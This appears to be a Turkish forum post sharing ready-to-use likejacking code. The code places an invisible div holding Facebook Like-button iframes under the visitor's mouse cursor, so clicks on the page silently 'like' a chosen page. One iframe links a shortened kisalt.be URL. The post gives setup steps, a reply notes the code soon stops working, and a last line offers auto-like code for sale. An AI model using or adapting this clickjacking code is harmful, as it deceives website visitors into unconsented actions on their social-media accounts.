![]() |
![]() |
<script type="text/javascript">
var interval;
$(function()
{
interval=setInterval("updateActiveElement();", 50);
});
function updateActiveElement()
{
if ( $(document.activeElement).attr('id')=="fbframe" )
{
clearInterval(interval);
iflag=1;
}
}
</script>
</head>
<body>
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhttp://kisalt.be/96hwtb&width=292&colorscheme=light&connections=10&stream=true&header=true&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:420px; height:80px;" allowTransparency="true"></iframe>
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FSAYFAADINIZ&width=292&colorscheme=light&connections=10&stream=true&header=true&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:420px; height:80px;" allowTransparency="true"></iframe>
</div>
<script>
var iflag = 0;
var icontainer = document.getElementById('icontainer');
var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
function mouseFollower(e){
/* DO NOT EDIT THIS */
if (window.event)
{ // for IE
icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
}
else
{
icontainer.style.top = (e.pageY-5)+'px';
icontainer.style.left = (e.pageX-5)+'px';
}
}
document.onmousemove = function(e) {
if (iflag == 0) {mouseFollower(e);}
}
</script>
Kod:<script type="text/javascript"> var interval; $(function() { interval=setInterval("updateActiveElement();", 50); }); function updateActiveElement() { if ( $(document.activeElement).attr('id')=="fbframe" ) { clearInterval(interval); iflag=1; } } </script> </head> <body> <div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer"> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fhttp://kisalt.be/96hwtb&width=292&colorscheme=light&connections=10&stream=true&header=true&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:420px; height:80px;" allowTransparency="true"></iframe> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FSAYFAADINIZ&width=292&colorscheme=light&connections=10&stream=true&header=true&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:420px; height:80px;" allowTransparency="true"></iframe> </div> <script> var iflag = 0; var icontainer = document.getElementById('icontainer'); var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes function mouseFollower(e){ /* DO NOT EDIT THIS */ if (window.event) { // for IE icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px'; icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px'; } else { icontainer.style.top = (e.pageY-5)+'px'; icontainer.style.left = (e.pageX-5)+'px'; } } document.onmousemove = function(e) { if (iflag == 0) {mouseFollower(e);} } </script>
kod içerisinde cftl+f yap ve SAYFAADINIZ diye arat, oraya Facebok'ta Facebook.com'dan sonra gelen sayfa adını yaz.
Örneğin, www.facebook.com/sizorenik.sancilar ise sayfanın urlsi
SAYFAADINIZ yazan yere yazman gereken ''sizofrenik.sancilar''
verdiğiniz kod 1-2 gün sonunda çalışmamaktadır.
Örn Olarak kendi blogumda kullandığım kod aynısı.2 günden sonra çalışmıyor
+internet explorer da çalışmıyor.
Macro ve Otolike kodu satılır.